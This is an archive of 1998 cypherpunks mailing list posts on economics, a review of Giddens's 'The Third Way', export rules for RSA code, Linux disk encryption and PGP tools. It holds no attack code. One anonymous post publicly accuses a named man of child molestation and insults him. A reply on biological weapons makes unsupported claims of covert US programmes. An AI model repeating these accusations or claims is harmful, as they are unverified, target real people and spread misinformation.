> Date:         Fri, 16 Oct 1998 14:12:55 EDT
> From: Hayek-L List Host <HayekList@AOL.COM>
> Subject:      Is it Keynes or Is it .... ?

> "A year or so from now, it will be difficult to find
> a single person who admits ever having believed
> that a global free market is a sensible way of
> running the world economy

No global economy is a good economy, by its very definition it is a monopoly
and contrary to the entire precip of free-market pundits.

A free-market is exclusively a *local* market.

> laissez-faire was short-lived .. The free market came
> about in England as a result not of slow evolution

No it didn't, it's the basic economic structure that everything else gets
built on. You start out with a completely free-market and build from there.
Free markets are for cavepeople.

> but swiftly, as a consequence of the unremitting use
> of the power of the state ..  The free market
> withered away gradually, thought the natural workings
> of democratic political competition ...

No, human psychology is what kills it.

> century England illustrates a vital truth: Democracy and
> the free market are rivals, not allies.

Duh. Economics has nothing to do with civil liberties or crimes.

One of the failures in current political and economic thought is the
necessity for the *government* to regulate the money. It isn't a new belief
either since it is embodies in our Constitution.

What is required for a free-market is a mechanism for 'fair competition'.
The problem is there is no way under a free-market to define fair or
competition.

> problematic relationship.  The normal concomitant
> of free markets is not stable democratic government
> but the volatile -- and not always democratic -- politics
> of economic insecurity.

This is circular reasoning. A free-market is not compatible to democracy (of
course not since a free-market requires two party economic contracts
exculsively) but is compatible with a market that is solely stabalized by
economic (in)security (which is a free-market economy after all).

> History exemplifies an equally important fact:
> Free market economies lack built-in stabilizers.
> Without effective management by government,
> they are liable to recurrent booms and busts --
> with all their costs in social cohesion and
> political stability.

Duh...

> .. But is was also a consequence of governments'
> holding to an orthodoxy that believed that so

Governments *are* a form of orthodoxy, they don't hold onto it since they
embody the concepts of orthodoxy.

> long as inflation is under control the economy
> can be relied upon to be self-regulating ,,,"

Nobody with half-a-clue believe this.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DOOM Anonymous Untraceable User <nobody@seclab.com>
Date: Sat, 17 Oct 1998 00:28:10 +0800
To: billh@ibag.com>
Subject: Re: Who is next? (re Jim's subpoena)
Message-ID: <199810161605.SAA04880@rogue.seclab.com>
MIME-Version: 1.0
Content-Type: text/plain



Could you mean this....

                First they came for the Communists,
                  and I didn't speak up,
                    because I wasn't a Communist.
                Then they came for the Jews,
                  and I didn't speak up,
                    because I wasn't a Jew.
                Then they came for the Catholics,
                  and I didn't speak up,
                    because I was a Protestant.
                Then they came for me,
                  and by that time there was no one
                    left to speak up for me.

                by Rev. Martin Niemoller, 1945.



William J. Hartwell wrote:
> 
> This ran through my mind this morning before I was totally awake. Maybe
> somebody can help me with the original author of this....
> 
> When they came for Kevin Mitnick I said nothing. After all he was a big
> time hacker and I wasn't a hacker so I did not speak up.
> 
> When they came for Jim Bell I said nothing. He was a criminal and I am not
> a criminal so I didn't speak up.
> 
> When they came for Toto I said nothing. Surely he was nuts and I am
> completely sane so I didn't speak up.
> 
> When they came for Jim Choate I said nothing. He runs a cypherpunks mailing
> list and I don't manage any lists so I didn't speak up.
> 
> When they come for me who will be left to speak up?
> 
> This is a poor paraphrase of the original but I wonder if it is something
> that we may be saying here in the U.S. soon?
> 
> --
>                                         William J. Hartwell
>                                            (602)987-8436
>                                           Queencreek, Az.
> 
> billh@ibag.com                  billh@interdem.com              billh@hartwell.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 17 Oct 1998 07:12:12 +0800
To: cypherpunks@cyberpass.net
Subject: CL: The Economist on Giddens, Hayek & the LSE
Message-ID: <v04020a02b24d7dc7b4b3@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



Beware of socialists pitching new paradigms. Maybe the Economist hasn't
succumbed to the "Cool Brittania" backwash as much as I thought it did --
nawwww....

Cheers,
Bob Hettinga

--- begin forwarded text


Date:         Fri, 16 Oct 1998 15:50:19 EDT
Reply-To: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
Sender: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
From: Hayek-L List Host <HayekList@AOL.COM>
Subject:      CL: The Economist on Giddens, Hayek & the LSE
To: HAYEK-L@MAELSTROM.STJOHNS.EDU

>>  Current Literature  <  --  Giddens  /  Political Thought at the LSE


'Bagehot', "The third way revealed", _The Economist_.  Sept 19, 1998.

>From the article:

"SOMETIMES you want to read a book a second time. You know, just to
make sure that there was nothing important you missed first time around.
In the end, though, Bagehot decided to skip the second reading of Anthony
Giddens's "The Third Way" ..  For the time being, first impressions
must stand. This book is awesomely, magisterially and in some ways
disturbingly vacuous.

Why disturbing? There are many bad books in the world. But the third way
is not just a parlour game for intellectuals puzzling over the content
of politics now that both socialism and "unbridled" capitalism are in
disrepute.
It has become the quasi-official political philosophy of Britain's governing
party, and is taken seriously enough to form the backdrop for a curious
political seminar that Bill and Hillary Clinton, Tony Blair and Romano
Prodi, the prime minister of Italy, plan to conduct in New York on September
23rd. Nor is "The Third Way" just any other book about what the third way
is. It is the first detailed account of it by the man who has become its
chief British prophet and interpreter. Even by the standards of the London
School of Economics, which provided a base for the likes of Friedrich Hayek,
the Webbs and Harold Laski, its present director exerts a powerful influence
on Downing Street. Of Mr Giddens (who, thanks to Mr Blair, shall be Lord
Giddens hereafter), as of no other living sociologist, it can be said that
what he thinks matters.

So what does he think? A large part of"The Third Way" consists of a
description
of where things stand after the death of socialism. Mr Giddens homes in
on "five dilemmas". In merciful summary, these are (i) that globalisation
is changing the meanings of nationhood, government and sovereignty. There
exists (2) a "new individualism" that is not necessarily selfish but which
means that social solidarity can no longer be imposed in a top-down way.
Although distinctions between left and right keep changing, the left cares
more about social justice and equality. However, (3), there is a category
of problems-such as global warming, devolution, the future of the European
Union-about which it is unhelpful to think in terms of left versus right.
(4) Some jobs (defence, lawmaking) can be done only by governments, even
though politicians are becoming less influential and pressure groups more
effective. And do not forget (5) that while environmental dangers can be
exaggerated it is highly dangerous to be sanguine about them, not least
because, as in the case of madcow disease, experts sometimes differ.

Hmm. At this point, the charitable reader may feel that although some of
these points may be obvious, and others arguable, Mr Giddens has at least
raised interesting questions. Moreover, they are original, in the narrow
sense that nobody else seems to have singled out these particular five
points and called them "dilemmas". The trouble with any argument constructed
at Mr Giddens's level of generalisation is that you begin to wonder whether
there might just as plausibly have been four dilemmas, or 14, or even whether
a different five could have been chosen just as easily  ..  But let
that pass. Philosophers describe the world. How does the prophet of
Britain's third way propose to change it?

Mr Giddens admits that what he is offering is merely an "outline". This
is a deceptive species of modesty given that what he claims to be outlining
is no less than "an integrated political programme covering each of the
major sectors of society." Here we learn amongst other things that
protectionism
is undesirable but so is a "blanket endorsement" of free trade; that there
should be no rights without responsibilities; that the protection of children
is the most important bit of family policy; that society should be "inclusive"
but not "strongly egalitarian"; that constitutions should aim for openness
and transparency; that there may be a case for a world criminal court;
that there is a need to control excessive overshoots in financial markets
but that the nature of these controls is "problematic"; that . .

But, really, why bother to go on?  .. it would have been nice  for Britain's
pre-eminent sociologist and the director of the LSE to come up with at
least one new proposal capable of ruffling at least someone's feathers.
Remember "The Road to Serfdom", Hayek's brave, hugely unfashionable
warning against planning made in the midst of a war that seemed to
have made planners indispensable?  By contrast, Mr Giddens's
integrated political programme boils down to a list of conventional appeals
to civic virtue, in which every bet is hedged and everyhard choice ducked.
It is just the sort of stuffthat could find its way risklessly into the
manifesto of any social democratic party interested in tarting up its image.

Which is presumably why he wrote it. Mr Giddens wants to restore the LSE
to a position of power and influence. How pleasing it must have been to
find in Tony Blair a clever, instinctive politician in the market for some
sort of ideology in which to dress up his opportunism. And how intellectually
disarming. Was it fear of setting out any positions that New Labour could
one day find embarrassing that made Mr Giddens write such a bad book? Whatever
the reason, the third way remains as mystifying as ever. Herbert Morrison-the
grandfather of Peter Mandelson, Mr Blair's cabinet colleague-once wickedly
defined socialism as what the Labour Party did. On the evidence of this
slight work, the third way is whatever New Labour does."



Anonymous, "Bagehot:  The third way revealed".  _The Economist_
Sept. 19, 1998  Vol: 348, Issue: 8086.  pp. 72-73.



Current Literature is a regular feature of the Hayek-L list.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 17 Oct 1998 08:27:26 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: CL: The Economist on Giddens, Hayek & the LSE (fwd)
Message-ID: <199810162359.SAA00011@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 16 Oct 1998 18:50:16 -0400
> From: Robert Hettinga <rah@shipwright.com>
> Subject: CL: The Economist on Giddens, Hayek & the LSE

> Beware of socialists pitching new paradigms.

Or (the only good thing Reagen ever said),

Trust, but verify.

> must stand. This book is awesomely, magisterially and in some ways
> disturbingly vacuous.
...
> Prodi, the prime minister of Italy, plan to conduct in New York on September
> 23rd.

Is anyone going or know if the various discussions will be made available?

> on "five dilemmas". In merciful summary, these are (i) that globalisation
> is changing the meanings of nationhood, government and sovereignty. There
> exists

This is the definition of 'civilization', an effect that is clearly
observable by studying history. The relationship between citizen and state
depends on (among other things) speed of communication (or transport), and
resource control.

As the speed of transport increases nations have a tendency to homogenize or
share cultural traits (not to mention genes). As time goes by the nations
change size and number in relation to resource control, normaly you get a
few large countries and lots of smaller ones. As time goes by you'll see
more and more of the smaller nations forming combines, hegemonies, balkans,
etc. This tendency drives the globalization of human culture. It is a basic
aspect of human greed to want the whole shebang. That is a result of humans
being social in nature, and having a fundamental neurosis about self. What
finaly determines if one or more nations will exist is the general growth
rates of each fundamentaly (and this is a bitch to describe to any
precision) different national/social/psychological type. As long as none of
them have a growth rate that is hyperbolic in nature (ie infinite magnitude
in finite time) then a multiplicity of such 'nations' will continue to
exist. A fundamental question should be what and how to measure the growth
rates of nations within this context?

There also needs to be a fundamental distinction between government and
business, as is made with religions. Businesses need to be regulated but it
should be by a indipendant political system from that defining civil issues
regarding individuals. There should also be a distinct funding system which
is also indipendant, but responsible for providing all funding for the other
political agents. It would be regulated by some sort of representative
system whereby people could elect various officials to select the process
through a representative system. In short, every political entity in a
government should consist of publicly elected officials with appropriate
support staff. There should be strictly enforced and relatively short-lived
term limits. A distinction in allowable forces for a government to use
between exterior (army) threats and internal civil disturbance (militia),
and nary the two should meet or ever be involved in day to day law
enforcement. In regards the civil branch of the above (ie executive,
legislative, judiciary) the executive branch should also be some sort of
elected panel, the concept of an individual representative needs to die a
deserved death. Personaly I like the idea of a panel of single
representatives from each state.

> (2) a "new individualism" that is not necessarily selfish but which
> means that social solidarity can no longer be imposed in a top-down way.

It's about time. I believe that a study of polyocracies would provide a much
better model for a democratic system.

I've come to the conclusion that the best way to deal with human culture is
to base everything on the fundamental issue of individual distinction, this
is what it means for all people to be created equal.

> of problems-such as global warming, devolution, the future of the European
> Union-about which it is unhelpful to think in terms of left versus right.

That's because nature is by its very nature apolitical. Politics will
regulate human society, it won't control it.

> (4) Some jobs (defence, lawmaking) can be done only by governments, even

No, they can only be done by a monopoly. If they don't then the sorts of
social institutions we normaly talk about can't exist.

> though politicians are becoming less influential and pressure groups more
> effective.

Which sortta balances out thankfuly...

> should be no rights without responsibilities; that the protection of children
> is the most important bit of family policy;

Does he extrapolate this to some sort of all-encompassing social authorization
for government intervention as is currently trying to be implimented?

 that society should be "inclusive"
> but not "strongly egalitarian";

Which means what? We let people in but we don't treat them like they live
here?

 that constitutions should aim for openness
> and transparency;

What the hell does that mean?

> that there may be a case for a world criminal court;

Only if nations aren't responsible for their own citizens...

I'd like to see the day when one nation sues another in a world court for
harms against their citizens...if the proposed system will require this as
easily as a single nation dropping on a single individual then it won't
work.

> that there is a need to control excessive overshoots in financial markets
> but that the nature of these controls is "problematic"; that . .

Don't fall for the 'bigger is better' school of economics. Individualy
stable markets should be highly regional, probably not national and most
definitely not global. Stability comes from a voluntary long-term
relationship between participants.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Adams <tom@cat.ping.de>
Date: Sat, 17 Oct 1998 02:39:58 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: FBI Affidavit on Ex-NSA Cryptanalyst
In-Reply-To: <199810151821.OAA23576@dewdrop2.mindspring.com>
Message-ID: <l03130303b24d49c6f179@[192.168.1.2]>
MIME-Version: 1.0
Content-Type: text/plain



At 14:13 Uhr -0400 15.10.1998, John Young wrote:

>Bad Ausburg is the location of one of the NSA intercept stations
>for the Echelon program is it not?

I think you mean Bad Aibling.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <squirrel6@nym.alias.net>
Date: Sat, 17 Oct 1998 04:13:45 +0800
To: cypherpunks@Algebra.COM
Subject: Re: IP: ISP not liable for customer's messages
Message-ID: <c66bcc0b6aa2784833554b2e219992ec@anonymous>
MIME-Version: 1.0
Content-Type: text/plain




Vladimir Z. Nuri wrote:
> 
> INTERNET PROVIDER NOT LIABLE FOR MESSAGES OF ITS CUSTOMERS
> 
...
> The
> defeated lawsuit, which is being appealed to the Supreme Court, tried
> to characterize America Online as "a home shopping network for
> pedophiles and child pornographers."  (AP/Washington Post 15 Oct 98)

Hey, what about us clueless spamming sticker collectors???

-- an AOL32 Luser




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 17 Oct 1998 09:55:59 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: "Annihilating less-than-useful contributors" (fwd)
Message-ID: <199810170132.UAA00278@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Information Security <guy@panix.com>
> Date: Fri, 16 Oct 1998 20:38:51 -0400 (EDT)
> Subject: "Annihilating less-than-useful contributors"

> #   their interest in "freakish, left-handed mollusks," he said
> #   collaborative software is needed that liberates the creative
> #   power of the best people and "annihilates the counterproductive."
> #   According to Sterling, the latter includes idiots, spammers,
> #   and less-than-useful contributors.
> #   ...
> #   Sterling envisions an "online utopia" that would occur if
> #   Web- and email-leveraging software were automatically
> #   moderated. 
> #   ...
> #   "If you could do this, you could advance knowledge," he said.
> #   The Net and the collaboration it enables would be able to add
> #   to the sum of human knowledge. 

Assuming, without statement of course, that we know what information is
important *before* we know it exists and we need it...the same old failure
of all utopianist...they assume one size fits all.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 17 Oct 1998 09:55:05 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Cyptography in the Information Age (fwd)
Message-ID: <199810170135.UAA00383@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 16 Oct 1998 21:08:14 -0400
> Subject: Cyptography in the Information Age
> From: steve.benjamin@juno.com (Stephen Benjamin)

> My paper will contain a 6-line (perl) implemenation of
> RSA.	Is my report subject to current Encryption Laws?
> If so, which ones? I plan on making a big deal out of
> how a 15 page research paper can't be exported from the U.S.A.

The paper itself isn't subject to export restrictions at this point in time
as I understand it. Now if you included a barcode, floppy, or some other
machine readable/executable then that media would be under restrictions.

> Also, How can I generate RSA keys in perl?
> I found a C program to do it, but I don't have C installed.

Now you get to learn how to translate...


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Sat, 17 Oct 1998 09:08:19 +0800
To: cypherpunks@cyberpass.net
Subject: "Annihilating less-than-useful contributors"
Message-ID: <199810170038.UAA04041@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



[ snipped, see full article at Declan's new site ]

#   http://www.wired.com/news/news/technology/story/15611.html
#   
#   5:45 p.m.  14.Oct.98.PDT
#   SAN FRANCISCO -- Science fiction author Bruce Sterling
#   acknowledges that he isn't a programmer, or even a
#   contributor to the kind of openly developed software project
#   [Apache] that brought his audience together on Wednesday. 
#   ...
#   Using a fictional example of people gathered online around
#   their interest in "freakish, left-handed mollusks," he said
#   collaborative software is needed that liberates the creative
#   power of the best people and "annihilates the counterproductive."
#   According to Sterling, the latter includes idiots, spammers,
#   and less-than-useful contributors.
#   ...
#   Sterling envisions an "online utopia" that would occur if
#   Web- and email-leveraging software were automatically
#   moderated. 
#   ...
#   "If you could do this, you could advance knowledge," he said.
#   The Net and the collaboration it enables would be able to add
#   to the sum of human knowledge. 
#   ...
#   Successful implementation of such a concept, Sterling said,
#   is critical to the success of the Net as a so-called "gift
#   economy".... [This] economy should function more like an
#   [actual] economy," he said. A differing set of rewards should
#   be returned for a differing set of efforts. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steve.benjamin@juno.com (Stephen Benjamin)
Date: Sat, 17 Oct 1998 09:56:19 +0800
To: mail2news_nospam-19981016-sci.crypt@anon.lcs.mit.edu
Subject: Cyptography in the Information Age
Message-ID: <19981016.210815.-1026785.0.Steve.Benjamin@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



X-Posted: sci.crypt, cypherpunks mailing list

For my Advanced Computer Science course in school I'm required to do
a research paper each quarter.  I have decided to do this quarter's
paper on Cyptography in the Information Age.

My paper will contain a 6-line (perl) implemenation of
RSA.	Is my report subject to current Encryption Laws?
If so, which ones? I plan on making a big deal out of
how a 15 page research paper can't be exported from the U.S.A.

Also, How can I generate RSA keys in perl?
I found a C program to do it, but I don't have C installed.

Thanks for any help you can give me! and please reply
through e-mail!

----------------------------------------------------------
Stephen Benjamin
E-mail address: Stephen {DOT} Benjamin {AT} juno {DOT} com
----------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 17 Oct 1998 11:05:42 +0800
To: cypherpunks@toad.com
Subject: CJ Indicted
Message-ID: <Version.32.19981016213004.0101c200@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Court docket shows that CJ has been indicted for:

  18:115A.F Threaten to Murder certain Federal Law
  Enforcement Officers and Judges

This is in addition to the original complaint:

  For Violation of 18:115(a)(1)(B): Threatening to assassin
  IRA officers 

Yes, it says "assassin IRA."

The other humor is that upon indictment for criminal charges
on September 30 a bench warrant was issued for CJ's arrest.
The arrest warrant was "returned unexecuted" on October 9,
due to "warrant issued in error" by the same magistrate who
issued the first arrest warrant on August 5, apparently forgetting
or not knowing that CypherAssassin2 was mental evaluing with 
CypherAssassin1 in MO. 

See the docket:

   http://jya.com/cej101498.htm

BTW, on why Jim Bell and CJ stopped over in OKC on the way 
to Springfield, we've learned that the Federal Transportation
Center is in OKC. It so happens that the Bureau of Prisons issued 
a wad of rules and regs today just to handle the growing crowd of
alleged IRA-Nobelists and international Chuckies:

   http://jya.com/bop101698.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 17 Oct 1998 07:26:47 +0800
To: cypherpunks@toad.com
Subject: Re: Happy Birthday to Convicted Child Molester Gary Burnore
In-Reply-To: <199810140550.HAA15476@replay.com>
Message-ID: <199810162251.AAA06073@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



gburnore@databasix.com (Gary L. Burnore) whined:

> >[snip out-of-date, erroneous sex offender registration]

He means you're an ignorant asswipe who shouldn't have told the
North Carolina authorities of your child molestation conviction in
California.  Too late for that, and nuking the page on NC registered
sex offenders' site doesn't make your criminal conviction go away
retroactively.

> More likely the one and only anonymous asshole. AKA RFG@monkeys.com   
> Ignore him. He goes away.

"One and only" ... wow!  But if claim to know his identity, then he
isn't anonymous.  Make up your little perverted mind.  As for
ignoring him, you just can't take your own advice, can you?

Just because you're pissed that someone anonymously blew the whistle
on your pederasty in Santa Clara, CA by informing your victim's
mother and school officials is no reason for such ad hominem.  You
were busted fair and square, and your own guilty plea sealed your
fate.  BTW, did you ever ask yourself how this "RFG" character would
have known that you were screwing your live-in girlfriend's daughter
behind her back, if he's "the one and only anonymous asshole"?

Getting sexual predators like you identified so that your neighbors
with children can keep an eye on you is reason enough for anonymous
remailers to exist, given your history of harassment against anyone
who dares to criticize you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 17 Oct 1998 13:25:39 +0800
To: mail2news_nospam-19981016-sci.crypt@anon.lcs.mit.edu
Subject: Re: Cyptography in the Information Age
In-Reply-To: <19981016.210815.-1026785.0.Steve.Benjamin@juno.com>
Message-ID: <199810170458.VAA00701@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



Let me know if you get arrested. I'll write about it.

-Declan



At 09:08 PM 10-16-98 -0400, Stephen Benjamin wrote:
>X-Posted: sci.crypt, cypherpunks mailing list
>
>For my Advanced Computer Science course in school I'm required to do
>a research paper each quarter.  I have decided to do this quarter's
>paper on Cyptography in the Information Age.
>
>My paper will contain a 6-line (perl) implemenation of
>RSA.	Is my report subject to current Encryption Laws?
>If so, which ones? I plan on making a big deal out of
>how a 15 page research paper can't be exported from the U.S.A.
>
>Also, How can I generate RSA keys in perl?
>I found a C program to do it, but I don't have C installed.
>
>Thanks for any help you can give me! and please reply
>through e-mail!
>
>----------------------------------------------------------
>Stephen Benjamin
>E-mail address: Stephen {DOT} Benjamin {AT} juno {DOT} com
>----------------------------------------------------------
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@idsi.net
Date: Sat, 17 Oct 1998 14:03:46 +0800
To: cypherpunks@toad.com
Subject: PGP utils?
Message-ID: <Pine.LNX.3.96.981017011849.10302A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain



Is there a utility for Unix (or source available?) that reads a PGP
encrypted message and displays some information on it, like what
key ID the message was encrypted with, and what ciphers were used?

Michael J. Graffam (mgraffam@idsi.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
They (who) seek to establish systems of government based on the
regimentation of all human beings by a handful of individual rulers..
call this a new order. It is not new, and it is not order."
				- Franklin Delano Roosevelt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Sat, 17 Oct 1998 11:32:43 +0800
To: cypherpunks@cyberpass.net
Subject: Disk (block device) encryption for Linux and *BSD?
Message-ID: <aa10c5dbb2675d55d77f115c2e5d2ef6@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>Apologies for the interruption,
>
>I'm looking for disk / partition encryption for Unix-alikes, especially
>Linux, OpenBSD and/or NetBSD.

Good luck. We're in the same boat. I'm using Andrew Mileski's patches,
but they're outdated, only implement CAST-128 and IDEA, and the user
interface leaves a lot to be desired. Writing a new user interface
is on my project list, but of course I can't export the thing.

>My websearch has been less than satisfactory - I found outdated Linux
>kernel patches for encryption loopback, and I distinctly remember reading
>about a serious bug in the use (or lack thereof) of key material in this
>code.

Andrew Mileski <aem@netcom.ca> has patches available via FTP from 
fractal.mta.ca, but they're very outdated. I think they're against 2.1.64,
but they'll run with kernels up to the 90s. Kernels after about 2.1.105
are hopelessly broken with regard to Andrew's patches, so I wouldn't advise
even trying it. If you use his patches, use kernel 2.1.105 or below.

I think those are in /pub/aem/crypto.

>Do patches for a current Linux kernel exist, and have all the known
>bugs been fixed?

There are several different versions floating around. There was some set
of patches on ftp.csua.berkeley.edu but they're outdated too. There was a
hole in some DES code somebody was distributing. 

>Also, there seems to be no version of Marutukku about that I can actually
>get to work on *BSD. Is Marutukku still being developed?

Again, good luck.

>Generally, is there a good page that tracks disk encryption for Unix?
>
>I'm currently using cfs here and there, and I have a specific question
>about that package, too:
>
>Does the cypherpunks list trust the patches that add Blowfish support
>to cfs?

Every time I've used CFS it has locked up into some kind of recursive loop
where it eats more and more CPU time until it finally takes all it can get.
Other people have had the same problem on both Linux and BSD. Other people
never have any problems. No clue why.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chatski carl <chatski@gl.umbc.edu>
Date: Sat, 17 Oct 1998 22:34:20 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: IP: Silent Weapon of Mass Destruction
In-Reply-To: <199810162207.PAA10003@netcom13.netcom.com>
Message-ID: <Pine.SGI.3.96A.981017090945.9966B-100000@umbc9.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain



A powerful statement of the obvious, with one important ommission: The
United states is the largest researcher, producer, experimenter with, and
user of biological weapons.  Despite 'honest' Dick Nixon's unilateral
pledge in 1972 that the US would not produce offensive BW weapons, they
have been doing so, keeping pace with developments in molecular biology.
Much research and development is privatized; it is not prohibited for
private corporations to develop such weapons.

A few observations:

The Army has used the term "Ethnic Biological weapons" since the late
60's.

There are 2 kinds of BW weapons development:
  o	battlefield weapons
  o	weapons of class warfare ( suitable for covert long term use
	against all or subsets of the civilian population ). 

And finally as one observes "new" diseases, one should remember that the
main thrust of the major BW research since the end of wwII, has been
against the immune system ... so that no defense can be mounted.

On Fri, 16 Oct 1998, Vladimir Z. Nuri wrote:
>........
> Microorganisms, it should be noted, are a very inexpensive
>  way to exterminate entire populations. Above all, many
>  microorganisms can be cheaply grown, each having its own
>  unique uses. As stressed by Carl Yaeger of Utah Valley State
>  College and Steven Fustero, IACSP Director of Operations,
>  this is a great advantage in deciding the effect wished to be
>  brought about on the section of the population at which the
>  attack is directed. Since the organisms are capable of rapid
>  reproduction, only a small amount is required to infect a very
>  large area.
>.... 
> But possibly more interesting than the large area to be
>  infected is the selectivity. With the development of biochemistry
>  and genetic engineering, it might be possible to target ethnic
>  groups .......
>..........
> Still another advantage could be secrecy and concealment.
>  Limited attacks could be carried out secretly before open
>  "hostilities" even began. As you can see, a whole new age of
>  warfare is beginning. According to an excellent PBS "Frontline"
>  documentary aired this week, the Soviet Union, even under
>  Mikhail Gorbachev, had already broken an international
>  agreement restricting chemical and biological weapons.

- Carl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 17 Oct 1998 17:38:32 +0800
To: mgraffam@idsi.net
Subject: Re: PGP utils?
In-Reply-To: <Pine.LNX.3.96.981017011849.10302A-100000@albert>
Message-ID: <199810170848.JAA18425@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




> Is there a utility for Unix (or source available?) that reads a PGP
> encrypted message and displays some information on it, like what
> key ID the message was encrypted with, and what ciphers were used?

Yes, the one I use is PGPacket by Mark Shoulson <shoulson@cs.columbia.edu>.

It used to be available at:

	ftp://ftp.ox.ac.uk/pub/crypto/pgp/utils/

It's written in perl (look for pgpacket.pl)

If the version there isn't greater than 3.0 email Mark and ask for the
latest version.  Version 3 and above can read all the pgp5 packets
also.  Really useful tool for PGP key tinkering.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 18 Oct 1998 00:31:43 +0800
To: "Private Liberty List" <Martin.P@parl.gc.ca>
Subject: Fwd: AUCRYPTO: for distrib. (fwd)
Message-ID: <199810171556.LAA01453@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



==================BEGIN FORWARDED MESSAGE==================
>From: Darren Reed <darrenr@reed.wattle.id.au>
>Message-Id: <199810160852.SAA04406@avalon.reed.wattle.id.au>
>Date: Fri, 16 Oct 1998 18:52:47 +1000 (EST)
>Reply-To: aucrypto@suburbia.net
>To: aucrypto@suburbia.net
>X-Mailing-List: <aucrypto@suburbia.net> 
>Subject: AUCRYPTO: for distrib. (fwd)

I read this today and thought it might be of general interest.

Darren

> The public key
> 
> The perception of people losing their privacy has hit the mainstream.  ABC
> News began a series on October 5th entitled Privacy Lost.
> 
> Operation Echelon, if you haven't heard of it yet you will once mainstream
> media gets a hold of it.  We began reading about this and the more
> information we found the more we began to think George Orwell worked for the
> NSA [USA National Security Agency ].  When all the details surface we
> may find that big brother really does
> exist and has for some time. The NSA reportedly worked closely with other
> security agencies to build an interception network.  This network is so vast
> that it can supposedly intercept every electronic communication on the
> planet.  The ramifications of this network existing we think will be far
> reaching and go a long way to forming online privacy policy in the future.
> 
> The NSA was also nice enough to provide us with our next topic as well.  It
> appears that up until a few years ago the NSA had a clandestine agreement
